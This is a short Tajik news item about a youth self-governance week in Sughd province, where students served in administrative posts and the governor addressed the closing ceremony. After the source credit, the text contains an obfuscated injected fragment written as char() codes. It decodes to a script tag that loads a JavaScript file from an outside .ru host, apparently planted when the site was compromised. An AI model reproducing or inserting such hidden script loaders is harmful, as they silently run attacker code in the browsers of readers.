21.05.2010
Ҷамъбасти ҳафтаи худидоракунӣ
Тавре пештар иттилоъ дода будем аз 13 то 20 уми май дар вилояти Суғд ҳафтаи худидоракунӣ байни ҷавонон гузаронида шуд. Рӯзи гузашта расми анҷоми он барпо шуд. Ёдоар мешавем, ки 35 нафар донишҷӯёни макотиби олии вилоят дар мансабҳои гуногуни МИҲД вилояти Суғд лаёқати роҳбарикунандагии худро санҷиданд. Дар расми анҷоми ҳафтаи худидоракунӣ раиси вилоят Қоҳир Расулзода ширкат варзида, доир ба фаъолияти роҳбарии ҷавонон ибрози ақида намуд. Ӯ қайд кард, ки минбаъд ҷавонон ба чорабиниҳои сатҳи вилоят ҳарчи бештар ҷалб карда шаванд.
Донишҷӯён низ қаноатмандии худро аз ин чорабинӣ баён намуданд. Ба ҳамаи иштирокчиён гувоҳнома дода шуд.
Суғд
Маълумот ва сурат аз сомонаи www.sugd.tj
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)0ae8a22a36380ad4a93dc0d19c6d9335.js" type="text/javascript">

ТАВЗЕҲОТ